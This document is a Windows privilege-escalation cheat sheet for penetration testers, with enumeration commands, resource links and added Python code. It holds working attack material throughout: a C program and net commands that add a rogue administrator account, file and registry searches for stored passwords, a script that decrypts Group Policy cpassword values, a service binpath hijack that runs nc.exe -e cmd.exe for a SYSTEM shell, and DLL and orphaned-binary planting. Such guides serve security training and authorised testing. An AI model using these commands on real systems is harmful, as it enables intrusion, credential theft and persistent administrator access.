Useful Resources
http://it-ovid.blogspot.in/2012/02/windows-privilege-escalation.html
http://toshellandback.com/2015/11/24/ms-priv-esc/
Watch YouTube videos
http://www.youtube.com/watch?v=kMG8IsCohHA
http://www.youtube.com/watch?v=_8xJaaQlpBo
http://www.greyhathacker.net/?p=738
Windows exploit suggester
https://github.com/GDSSecurity/Windows-Exploit-Suggester
python /home/nikhil/scripts/windows-exploit-suggester.py -d 2016-07-02-mssb.xls -i systeminfo -l
-d : the MSRC bulletin spreadsheet (fetch it with --update)
-i : a file holding the target's systeminfo output
-l : show only local exploits
https://www.exploit-db.com/docs/26000.pdf
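The core of what the suggester does, as an added example (not from this cheat sheet and not the tool's own code): parse systeminfo output for the OS and installed hotfixes, then list bulletins whose fix KB is absent. The systeminfo text is constructed; the three bulletin/KB pairs are real but the table is only an illustration of the matching, the tool itself matches against the full MSRC spreadsheet.

```python
"""Added example, not part of the cheat sheet or of Windows-Exploit-Suggester:
parse `systeminfo` output and report bulletins whose patch KB is missing.
SAMPLE_SYSTEMINFO is CONSTRUCTED. BULLETINS holds real bulletin/KB pairs but is
a tiny illustration, not a substitute for the MSRC spreadsheet (--update)."""
import re

# (bulletin, KB that ships the fix, OS names it applies to, note)
BULLETINS = [
    ("MS14-058", "3000061", ("Windows 7", "Windows Server 2008 R2", "Windows 8.1"),
     "win32k.sys TrackPopupMenu, local"),
    ("MS15-051", "3045171", ("Windows 7", "Windows Server 2008 R2", "Windows 8.1"),
     "win32k.sys, local"),
    ("MS16-032", "3139914", ("Windows 7", "Windows Server 2008 R2", "Windows 8.1", "Windows 10"),
     "Secondary Logon, local"),
]

SAMPLE_SYSTEMINFO = """Host Name:                 WS01
OS Name:                   Microsoft Windows 7 Professional
OS Version:                6.1.7601 Service Pack 1 Build 7601
System Type:               x64-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB2533623
                           [02]: KB3045171
                           [03]: KB2534111
"""


def parse_systeminfo(text):
    """OS name/version/architecture plus the set of installed KB numbers (digits only)."""
    def field(name):
        m = re.search(r"^%s:\s*(.+)$" % re.escape(name), text, re.M)
        return m.group(1).strip() if m else ""
    return {"name": field("OS Name"), "version": field("OS Version"),
            "arch": field("System Type"),
            "hotfixes": set(re.findall(r"\bKB(\d{6,7})\b", text))}


def missing_patches(info, table=BULLETINS):
    """Bulletins that apply to this OS and whose fix KB is not in the hotfix list."""
    return [(bulletin, kb, note) for bulletin, kb, oses, note in table
            if any(os_name in info["name"] for os_name in oses)
            and kb not in info["hotfixes"]]


if __name__ == "__main__":
    info = parse_systeminfo(SAMPLE_SYSTEMINFO)
    print(info["name"], info["version"], info["arch"])
    for bulletin, kb, note in missing_patches(info):
        print(f"{bulletin} (KB{kb} missing): {note}")
```

A missing KB only means the bulletin was not applied through that KB; a later cumulative rollup can supersede it, so confirm on the box before burning an exploit.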
Windows Administrator to System
PSEXEC.exe -i -s -d CMD
(Sysinternals PsExec, run from an elevated admin prompt: -s runs as SYSTEM, -i makes it interactive on the desktop, -d does not wait for the process to exit)
https://blogs.technet.microsoft.com/askds/2008/10/22/getting-a-cmd-prompt-as-system-in-windows-vista-and-windows-server-2008/
http://carnal0wnage.attackresearch.com/2013/07/admin-to-system-win7-with-remoteexe.html
Add Admin User account
net user /add [username] [password]
net localgroup administrators [username] /add
Compile the following C code into an exe to add an admin user account (same two net commands, run through system(); the user "ashoka" / password "qwerty" is the page's example)
#include <stdlib.h>
int main(void)
{
    /* create the local user, then put it in the local Administrators group */
    system("net user /add ashoka qwerty");
    system("net localgroup administrators ashoka /add");
    return 0;
}
Windows Priv Escalation Info gather
- windows-privesc-check2.exe
windows-privesc-check2.exe --audit -a -o wpc-report
- wmic_info.bat
Basic Commands
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
hostname
echo %username%
net users
net user user1
If user is in power user group, refer https://blogs.technet.microsoft.com/markrussinovich/2006/05/01/the-power-in-power-users/
net view
net user /domain
echo %logonserver%
ipconfig /all
route print
arp -a
netstat -ano
netsh firewall show state
netsh firewall show config
(the firewall context is deprecated; on Vista and later the advfirewall context is the one that shows the current profiles and rules)
schtasks /query /fo LIST /v
tasklist /SVC
net start (lists running Windows services)
DRIVERQUERY
Search for file names
dir /s *pass* == *cred* == *vnc* == *.config*
(cmd treats = as a separator, so this is one dir over four patterns)
Search within files
findstr /si pass *.xml *.ini *.txt *.config *.cfg *.bat
findstr /si pwd *.xml *.ini *.txt *.config *.cfg *.bat
Search registry
reg query HKLM /f password /t REG_SZ /s
reg query HKLM /f pass /t REG_SZ /s
reg query HKLM /f pwd /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
Search for sensitive files
dir sysprep.inf /s
dir sysprep.xml /s
dir Unattended.xml /s
When the machine is on a domain (Group Policy Preferences, GPP)
Search for Groups.xml (also ScheduledTasks.xml, Services.xml, Drives.xml, DataSources.xml, Printers.xml) under the domain SYSVOL share; any cpassword="..." attribute is an encrypted password
Metasploit module for extracting it : post/windows/gather/credentials/gpp
C:\Windows\SYSVOL\sysvol (backing folder of the share on a domain controller; from a member machine read \\<domain>\SYSVOL)
C:\ProgramData\Microsoft\Group Policy\History (local cache of the preferences already applied to this host)
These two paths are the ones the above post module searches
Encryption key: AES-256 with a key Microsoft published in the protocol documentation, so every cpassword decrypts offline: https://msdn.microsoft.com/en-us/library/Cc422924.aspx
MS14-025 stopped admins from setting new cpasswords but did not remove existing ones from SYSVOL
Good resource on this topic : http://www.toshellandback.com/2015/08/30/gpp/
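The decryption itself, as an added example (not part of the cheat sheet and not the Metasploit module's code): base64-decode the cpassword, AES-256-CBC with the published key and a zero IV, strip PKCS#7 padding, decode UTF-16LE. It assumes either pycryptodome or the cryptography package is installed; the cut-down Groups.xml is constructed and its cpassword is the widely published test value, not one from a real domain.

```python
"""Added example, not part of the cheat sheet or of Metasploit's gpp module:
decrypt the cpassword attribute of a Group Policy Preferences XML file.
GPP_KEY is the 32-byte AES key Microsoft published in MS-GPPREF. The sample XML
is CONSTRUCTED (real files also carry clsid/uid GUIDs); its cpassword is the
well-known public test vector. Assumes pycryptodome or `cryptography`."""
import base64
import xml.etree.ElementTree as ET

GPP_KEY = bytes.fromhex(
    "4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b")


def _aes_cbc_decrypt(key, iv, data):
    """Raw AES-CBC decrypt (no padding handling), with whichever library is present."""
    try:
        from Crypto.Cipher import AES                       # pycryptodome
        return AES.new(key, AES.MODE_CBC, iv).decrypt(data)
    except ImportError:
        from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
        dec = Cipher(algorithms.AES(key), modes.CBC(iv)).decryptor()
        return dec.update(data) + dec.finalize()


def gpp_decrypt(cpassword):
    """cpassword is base64 with its '=' padding stripped; ciphertext is AES-256-CBC
    with an all-zero IV; plaintext is UTF-16LE with PKCS#7 padding."""
    padded = cpassword + "=" * (-len(cpassword) % 4)
    raw = _aes_cbc_decrypt(GPP_KEY, b"\x00" * 16, base64.b64decode(padded))
    pad = raw[-1]
    if not 1 <= pad <= 16 or raw[-pad:] != bytes([pad]) * pad:
        raise ValueError("bad PKCS#7 padding: corrupt cpassword")
    return raw[:-pad].decode("utf-16-le")


def find_cpasswords(xml_text):
    """Yield (account, cpassword, cleartext) for every element carrying cpassword.
    The account attribute is named differently per preference type."""
    for el in ET.fromstring(xml_text).iter():
        cp = el.get("cpassword")
        if cp:
            who = next((el.get(a) for a in ("userName", "runAs", "accountName", "username")
                        if el.get(a)), "?")
            yield who, cp, gpp_decrypt(cp)


SAMPLE_GROUPS_XML = """<Groups>
  <User name="Administrator (built-in)" changed="2015-02-18 01:53:01">
    <Properties action="U" newName="" fullName="" description=""
      cpassword="j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw"
      changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0"
      userName="Administrator (built-in)"/>
  </User>
</Groups>"""

if __name__ == "__main__":
    for who, cp, clear in find_cpasswords(SAMPLE_GROUPS_XML):
        print(f"{who}: {clear}")
```

Run it over every *.xml you pull from SYSVOL or the local History folder; a padding error means the value was not a GPP cpassword at all.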
Install *.msi as SYSTEM if both of these values exist and are set to 1 (msiexec then runs any .msi you supply with SYSTEM privileges)
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
Windows Services
Info on a service
sc qc <service name>
Accept the accesschk EULA up front so no dialog pops up on the target's desktop :
accesschk.exe /accepteula
Use accesschk 5.2 if 6.0 doesn't work
Access permissions on a specific service
accesschk.exe -ucqv <service name>
Services writable by a specific group (here everything Authenticated Users can reconfigure)
accesschk.exe -uwcqv "Authenticated Users" *
Look for any of the following on a service for a group you belong to: SERVICE_ALL_ACCESS, SERVICE_CHANGE_CONFIG, WRITE_DAC, WRITE_OWNER (SERVICE_CHANGE_CONFIG alone is enough to change binpath; also check for SERVICE_START / SERVICE_STOP, otherwise you need a reboot to get the new binary run)
Modifying vulnerable services
sc qc upnphost
(record the original BINARY_PATH_NAME and SERVICE_START_NAME so you can put them back)
sc config upnphost binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
sc config upnphost obj= ".\LocalSystem" password= ""
sc qc upnphost
net start upnphost
(the space after each = in sc config is required; have a listener on 127.0.0.1:9988 before starting; the SCM reports a start failure/timeout because nc never answers it, but the SYSTEM shell has connected back by then)
Files/Folder Permissions
- Examine ALL the binpaths for the windows services, scheduled tasks and startup tasks.
- Look for permissions on files/folders if can be changed.
- Replace the binaries/DLLs if possible
Find all weak folder permissions per drive.
accesschk.exe -uwdqs Users c:\
accesschk.exe -uwdqs “Authenticated Users” c:\
Find all weak file permissions per drive.
accesschk.exe -uwqs Users c:\*.*
accesschk.exe -uwqs “Authenticated Users” c:\*.*
Find weak permissions via Cacls or ICacls
cacls "C:\Program Files" /T | findstr Users
or
icacls "C:\Program Files" /T | findstr Users
(findstr Users also matches read-only entries such as (RX); what counts is Users / Authenticated Users / Everyone with (F), (M), (W) or the specific rights WD / AD, on an entry not marked (IO), which applies only to children)
DLL Hijacking
Look for a service (or any other process running with higher privileges) that tries to load a DLL that does not exist: the loader then walks the search order below and a directory you can write to gets its turn. To find which services do that, run the same service in a test environment and watch it with Sysinternals procmon (filter on CreateFile of *.dll with Result NAME NOT FOUND). DLL redirection could also be used. https://msdn.microsoft.com/en-us/library/windows/desktop/ms682600(v=vs.85).aspx
You can see the DLL search order on 32-bit systems below:
1 – The directory from which the application loaded No access as limited user
2 – 32-bit System directory (C:\Windows\System32) No access as limited user
3 – 16-bit System directory (C:\Windows\System) No access as limited user
4 – Windows directory (C:\Windows) No access as limited user
5 – The current working directory (CWD) NA
6 – Directories in the PATH environment variable (system then user)
Check for permissions on directories in PATH environment variable
echo %PATH%
accesschk.exe -dqv "C:\Python27"
Generate a DLL payload with msfvenom (output format dll), name it after the missing DLL and drop it in the writable search-order directory; it is loaded the next time the service starts
VNC Stored
reg query “HKCU\Software\ORL\WinVNC3\Password”
Windows Autologin (DefaultUserName / DefaultPassword):
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
SNMP Parameters (community strings):
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP"
Putty clear text proxy credentials:
reg query “HKCU\Software\SimonTatham\PuTTY\Sessions”
Password Recovery Tools
Shatter Attack
For Windows NT 4.0, 2000 and XP (needs a privileged interactive service sharing the user's desktop; session 0 isolation from Vista on removes that)
https://en.wikipedia.org/wiki/Shatter_attack
http://www.hpl.hp.com/techreports/2005/HPL-2005-87.pdf
Scheduled Tasks
schtasks /query /fo LIST /v
Find a task pointing to an insecure location
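The three checks above (service binpaths and their folders, directories on PATH, task commands pointing at insecure locations) are one and the same cross-check, so here is one added example serving all of them (not code from the cheat sheet): parse icacls output into the set of folders a low-privileged principal can write to, pull every binary out of sc qc and schtasks output plus each PATH entry, and report the overlaps. All sample text is constructed to look like tool output and the service/task names are made up; it also flags unquoted service paths containing spaces, a generalisation of the binpath check.

```python
"""Added example for this cheat sheet (not part of it): cross-check the binaries
that services and scheduled tasks run, plus every directory on PATH, against
folders a low-privileged principal can write to, using icacls output. All sample
text (sc qc, schtasks, %PATH%, icacls) is CONSTRUCTED; service/task names are made up."""
import re

WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "DC"}   # rights that let you add/replace a file
LOW_PRIV = {r"BUILTIN\Users", r"NT AUTHORITY\Authenticated Users", "Everyone"}
# icacls: "<path> <principal>:<rights>" for a directory's first ACE, "<indent><principal>:<rights>" after
ACE_RE = re.compile(r"^(?P<path>.*?)\s*(?P<who>(?:NT AUTHORITY|NT SERVICE|CREATOR OWNER|"
                    r"[^\s:\\]+)(?:\\[^:\\]+)?):(?P<perms>(?:\([A-Z,]*\))+)\s*$")

def writable_dirs(icacls_text, principals=LOW_PRIV):
    """Directories (lower-cased) where a principal in `principals` can write.
    (IO) ACEs are inherit-only: they cover children, not the folder itself."""
    found, current = set(), None
    for line in icacls_text.splitlines():
        m = ACE_RE.match(line)
        if not m:
            continue
        if m.group("path"):
            current = m.group("path").rstrip("\\").lower()
        flags = re.findall(r"\(([A-Z,]*)\)", m.group("perms"))
        rights = {r for f in flags for r in f.split(",")}
        if current and m.group("who") in principals and "IO" not in flags and rights & WRITE_RIGHTS:
            found.add(current)
    return found

def binary_path(cmdline):
    """Executable in a BINARY_PATH_NAME / 'Task To Run' value -> (path, unquoted_with_spaces)."""
    cmd = cmdline.strip()
    if cmd.startswith('"'):
        return cmd[1:cmd.index('"', 1)], False
    m = re.match(r"(.+?\.(?:exe|bat|cmd|ps1|vbs))(?:\s|$)", cmd, re.I)
    exe = m.group(1) if m else cmd.split(" ")[0]
    return exe, " " in exe

def unquoted_candidates(path):
    """Paths CreateProcess tries before the real binary when an unquoted path has spaces."""
    return [path[:i] + ".exe" for i, ch in enumerate(path) if ch == " "]

def services(sc_qc_text):
    """(name, command line) from concatenated `sc qc <svc>` output."""
    for block in re.split(r"(?m)^SERVICE_NAME:\s*", sc_qc_text)[1:]:
        m = re.search(r"BINARY_PATH_NAME\s*:\s*(.+)", block)
        if m:
            yield block.split("\n", 1)[0].strip(), m.group(1).strip()

def tasks(schtasks_text):
    """(task, run-as user, command line) from `schtasks /query /fo LIST /v` output."""
    for block in re.split(r"(?m)^TaskName:\s*", schtasks_text)[1:]:
        run = re.search(r"Task To Run:\s*(.+)", block)
        user = re.search(r"Run As User:\s*(.+)", block)
        if run:
            yield block.split("\n", 1)[0].strip(), (user.group(1).strip() if user else "?"), run.group(1).strip()

def audit(sc_qc_text, schtasks_text, path_env, icacls_text):
    """Findings as (kind, subject, detail) tuples."""
    wd, out = writable_dirs(icacls_text), []
    parent = lambda p: p.rsplit("\\", 1)[0].lower()
    for name, cmd in services(sc_qc_text):
        exe, unquoted = binary_path(cmd)
        if unquoted:
            out.append(("unquoted-service-path", name, exe))
        if parent(exe) in wd:
            out.append(("writable-service-binary-dir", name, exe))
    for name, user, cmd in tasks(schtasks_text):
        exe, _ = binary_path(cmd)
        if parent(exe) in wd:
            out.append(("writable-task-binary-dir", f"{name} (runs as {user})", exe))
    for d in path_env.split(";"):
        if d.strip().rstrip("\\").lower() in wd:
            out.append(("writable-path-dir", d.strip(), "DLL search order step 6"))
    return out

SC_QC = r"""SERVICE_NAME: upnphost
        BINARY_PATH_NAME   : C:\Windows\System32\svchost.exe -k LocalServiceAndNoImpersonation
SERVICE_NAME: BackupAgent
        BINARY_PATH_NAME   : C:\Tools\agent.exe -svc
        SERVICE_START_NAME : LocalSystem
SERVICE_NAME: UpdaterSvc
        BINARY_PATH_NAME   : C:\Program Files\Acme Updater\updater.exe
"""
SCHTASKS = r"""HostName:      WS01
TaskName:      \Maintenance\NightlyBackup
Task To Run:   C:\Tools\backup.bat
Run As User:   SYSTEM
"""
PATH_ENV = r"C:\Windows\system32;C:\Windows;C:\Python27;C:\Python27\Scripts"
ICACLS = r"""C:\Program Files BUILTIN\Users:(OI)(CI)(RX)
                 NT AUTHORITY\SYSTEM:(OI)(CI)(F)
C:\Tools NT AUTHORITY\Authenticated Users:(OI)(CI)(M)
         BUILTIN\Administrators:(OI)(CI)(F)
C:\Python27 BUILTIN\Users:(OI)(CI)(F)
C:\Data BUILTIN\Users:(OI)(CI)(IO)(F)
"""

if __name__ == "__main__":
    for finding in audit(SC_QC, SCHTASKS, PATH_ENV, ICACLS):
        print(*finding)
```

Feed it the real output of sc qc for every service in sc query, schtasks /query /fo LIST /v, echo %PATH% and icacls over each directory those paths live in; a writable-service-binary-dir or writable-task-binary-dir hit running as LocalSystem/SYSTEM is the same result as the sc config trick above without needing SERVICE_CHANGE_CONFIG, and an unquoted-service-path hit is only useful if one of the unquoted_candidates() directories is writable.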
Orphaned Installs
Leftovers of uninstalled software: a service, scheduled task or Run key that still points at a binary which no longer exists. If the directory it points into is writable, drop your own binary under that name and wait for (or trigger) the next start. To identify them, take every binpath / Task To Run / autorun path from the enumeration above and check whether the file still exists and who can write to its directory.